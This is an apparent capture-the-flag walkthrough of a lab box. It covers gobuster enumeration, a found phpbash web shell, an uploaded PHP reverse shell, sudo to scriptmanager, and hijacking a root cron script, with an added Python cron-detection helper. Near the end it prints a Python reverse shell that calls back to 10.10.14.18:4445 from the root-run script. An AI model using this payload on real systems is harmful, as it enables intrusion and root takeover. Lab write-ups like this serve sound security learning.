Port Scanning, General Enumeration and Access (Nmap, Gobuster)
The initial Nmap scan showed that the only open port is 80 (HTTP).
The site on port 80 describes a pretty neat tool, but that's not a lot to go on.
gobuster dir -u http://10.10.10.68/ -w /dirs/small.txt -x php
The wordlist hit phpbash, a PHP web shell sitting on the server!
Privesc (php reverse shell, python, cronjobs)
We can upload files to the /uploads directory in the webroot, so a PHP reverse shell dropped there runs as soon as we request it over HTTP.
Let's upgrade the dumb reverse shell to a real one with a pty:
python3 -c 'import pty; pty.spawn("/bin/bash")'
Checking sudo -l as www-data shows we can run commands as scriptmanager without a password, so switching is easy enough:
sudo -u scriptmanager /bin/bash
There's a scripts folder owned by scriptmanager.
Interesting: the python script in it is ours, but the text file next to it is owned by root?
I see, so the script writes that file when it runs.
Moving the old test.txt to test.txt.bak and re-running the script ourselves, we can see that the new test.txt is owned by us. So something with root privileges must have run the script earlier. Maybe a cron job? Let's test: delete our copy, wait a minute or two, and check whether the file comes back and who owns it.
It's back, and owned by root!
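The test above (watch whether the file reappears, and who owns it) as an added example, not code from the original writeup. It assumes the paths /scripts/test.py and /scripts/test.txt from the walkthrough and a Linux host; the demo() function simulates the root cron job offline with a fake sleep so the logic can be checked without the box.

```python
import os
import pwd
import shutil
import tempfile
import time


def file_state(path):
    """Owner name and integer mtime of path, or None if it does not exist."""
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return None
    return pwd.getpwuid(st.st_uid).pw_name, int(st.st_mtime)


def watch(path, interval=5, rounds=24, sleep=time.sleep):
    """Poll `path` every `interval` seconds, `rounds` times, and record
    (elapsed_seconds, state) whenever owner or mtime changes.
    A file that vanishes and comes back owned by root on a fixed cadence
    is the signature of a root cron job writing it."""
    events = []
    last = object()  # sentinel so the first poll is always recorded
    for i in range(rounds):
        cur = file_state(path)
        if cur != last:
            events.append((i * interval, cur))
            last = cur
        if i < rounds - 1:
            sleep(interval)
    return events


def hijack_check(script, output):
    """The privesc condition: we can write the script, but its output file
    is created by a different (privileged) user."""
    out = file_state(output)
    me = pwd.getpwuid(os.geteuid()).pw_name
    writable = os.access(script, os.W_OK)
    return {
        "script_writable": writable,
        "output_owner": out[0] if out else None,
        "hijackable": writable and out is not None and out[0] != me,
    }


def demo():
    """Offline simulation (constructed data): a fake sleep stands in for the
    cron job and recreates test.txt before the third poll. Returns the events
    watch() recorded and the hijack_check() result for the temp files."""
    d = tempfile.mkdtemp()
    script = os.path.join(d, "test.py")
    target = os.path.join(d, "test.txt")
    with open(script, "w") as f:
        f.write("f = open('test.txt', 'w')\nf.write('hello')\nf.close()\n")
    calls = {"n": 0}

    def fake_sleep(_seconds):
        calls["n"] += 1
        if calls["n"] == 2:  # "cron" fires: the file reappears
            with open(target, "w") as f:
                f.write("hello\n")
            os.utime(target, (1000000, 1000000))  # deterministic mtime

    events = watch(target, interval=60, rounds=4, sleep=fake_sleep)
    check = hijack_check(script, target)
    shutil.rmtree(d)
    return events, check


if __name__ == "__main__":
    # On the box: two minutes of 5-second polls on the real file.
    for elapsed, state in watch("/scripts/test.txt", interval=5, rounds=24):
        print("t+%3ds %s" % (elapsed, state))
    print(hijack_check("/scripts/test.py", "/scripts/test.txt"))
```

In the simulation the output file is created by our own uid, so hijackable stays False; on the box the owner comes back as root and the flag flips to True, which is exactly the condition that makes the next step work.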
Let's give this boring old test.py some fangs. When the cron job runs it as root, it connects back to our listener and hands us a bash pty:
import socket,os,pty
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.18",4445))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
pty.spawn("/bin/bash")
I wrote the new test.py on my machine and transferred it over, started a listener on 4445, and…